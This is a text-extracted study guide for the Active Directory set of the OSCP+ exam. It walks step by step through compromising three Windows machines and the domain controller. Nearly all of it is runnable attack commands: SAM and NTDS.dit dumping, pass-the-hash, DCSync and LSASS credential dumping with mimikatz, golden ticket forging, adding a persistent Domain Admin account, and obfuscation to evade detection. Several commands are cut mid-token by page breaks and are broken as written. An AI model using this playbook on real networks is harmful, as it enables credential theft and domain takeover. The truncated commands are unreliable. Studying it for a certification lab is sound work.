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Setup and Pre-Login Preparation

1. Log into VPN/Network Environment:

Connect to the network where the AD machines are hosted. This may be
provided via a VPN or directly if it’s a local lab setup.

Confirm network connectivity by pinging each machine in the set.

2. Credential-Based Login to Machine #1:

You have been given a username and password. Use it to try logging in

RDP: xfreerdp /u:<username> /p:<password> /v:<Machine1_IP>

WinRM (if allowed): evil-winrm -i <Machine1_IP> -u <username> -p <password>

If successful, you’ll have your initial foothold on Machine #1.

Machine #1 (10 Points) - Initial Foothold and Privilege

Once logged into Machine #1, we’ll begin by performing some basic enumeration
to understand the environment and seek ways to escalate privileges.

Step 1: Basic Enumeration

Hostname and IP Configuration:

ipconfig /all

This will provide information about network configuration and potential subnet
ranges to scan later.

List Local Users:

oscp+ 1
net user

Enumerate local users to understand available accounts and check for any
inactive/legacy accounts that may have weak passwords.

Shared Directories:

net view \\\\<Machine1_IP>

Check for accessible network shares that may contain sensitive information or
further login credentials.

Step 2: Privilege Escalation Techniques on Machine #1

Technique 1: Service Misconfiguration

Identify Services with Weak Permissions:

sc query state= all | findstr "SERVICE_NAME"

If you find a vulnerable service that allows file modifications in its path,
replace its executable with your own payload to gain higher privileges.

Technique 2: Password Hunting

Search for Sensitive Files in Common Directories:
Configuration files often contain clear-text passwords or connection strings
with credentials. Look in
C:\\ProgramData , C:\\Users\\All Users , and application-specific folders like

C:\\Program Files .

dir /s /b C:\\Users\\Public\\*.config

Technique 3: Dumping SAM Database

If you have administrative privileges or gain access to the SAM (Security
Account Manager) file, try to dump it:

oscp+ 2
reg save HKLM\\SAM sam.save
reg save HKLM\\SYSTEM system.save

Use secretsdump.py (from Impacket ) on the extracted SAM and SYSTEM files to
obtain password hashes.

Machine #2 (10 Points) - Intermediate Machine and AD

Assuming you now have credentials or a hash from Machine #1, we’ll attempt to
log into Machine #2.

Step 1: Lateral Movement to Machine #2

Pass-the-Hash (PtH):

If you obtained NTLM hashes, authenticate to Machine #2 without knowing

the password:

psexec.py <domain>/<username>@<Machine2_IP> -hashes <NT


Credential Reuse:

If you have plaintext credentials, log into Machine #2 using the same
RDP/WinRM methods as for Machine #1.

Step 2: Active Directory Enumeration on Machine #2

AD User Enumeration:

PowerView ( Get-NetUser ) can be used to list all users in AD. Try:

Get-NetUser | Select Name, SamAccountName

List Group Memberships:

oscp+ 3
Get-NetGroupMember -GroupName "Domain Admins"

Step 3: Privilege Escalation Techniques on Machine #2

Technique 1: Group Policy Preferences (GPP) Abuse

Check for cpassword in the SYSVOL share to obtain plaintext passwords stored
in XML files.

dir \\\\<domain>\\SYSVOL\\<domain>\\Policies\\ /s /b | fin

dstr cpassword

Technique 2: BloodHound Analysis

Use SharpHound to gather data for BloodHound, which will help identify
attack paths to privileged accounts:

.\\SharpHound.exe -c All -d <domain> -u <username> -p <pas

sword> -f AllData

Upload the data to BloodHound and examine the graph for possible privilege
escalation paths, especially for “Shortest Path to Domain Admins.”

Technique 3: Scheduled Task and Service Exploitation

Check for any writable scheduled tasks or services that may allow privilege

schtasks /query /fo LIST /v

Machine #3 (20 Points) - Domain Controller

This machine is the Domain Controller, the ultimate target, where final credentials
and flags are likely stored.

oscp+ 4
Step 1: Targeted AD Attacks on Domain Controller

Technique 1: DCSync Attack

If you have privileges for Replicating Directory Changes , execute a DCSync attack
using mimikatz :

mimikatz # lsadump::dcsync /domain:<domain> /user:<target_


Technique 2: Dumping the NTDS.dit Database

Locate and Copy NTDS.dit:

Find the NTDS.dit file (usually in C:\\Windows\\NTDS\\ ). Copy both NTDS.dit

and the SYSTEM registry hive.

Extract Credentials:

Use secretsdump.py to dump credentials from NTDS.dit:

secretsdump.py -ntds NTDS.dit -system SYSTEM LOCAL

Step 2: Golden Ticket Attack for Persistent Access

Create Golden Ticket with Mimikatz:

kerberos::golden /domain:<domain> /sid:<domain_SID> /krbtg

t:<NTLM_hash> /user:Administrator

This attack will allow you to generate valid Kerberos tickets and impersonate
any user indefinitely.

Step 3: Credential Harvesting with LSASS

Dump LSASS to retrieve clear-text credentials directly:

mimikatz # sekurlsa::logonPasswords

oscp+ 5
Post-Exploitation and Flag Collection
1. Flag Locations:

Check for flags on each machine, usually located in C:\\Users\\Public or

another specified directory.

Ensure to take screenshots as evidence and document each flag’s path.

2. Persistence Setup (If Required):

If allowed, create a new domain user and add them to privileged groups:

net user new_admin <password> /add /domain

net group "Domain Admins" new_admin /add /domain

Additional Tips for Efficiency and Stealth

1. Use Stealthy Enumeration Tools:

Invoke-Obfuscation can obfuscate PowerShell scripts to bypass detection.

2. Document Everything:

Log all commands, paths, flags, and credentials obtained for accurate

3. Alternative Login Techniques:

If RDP or WinRM fails, try SMBexec , CrackMapExec , or evil-winrm as fallback


This comprehensive guide, with specific commands and explanations, should help
you navigate each machine effectively and capture maximum points on the AD
set. Good luck!

oscp+ 6

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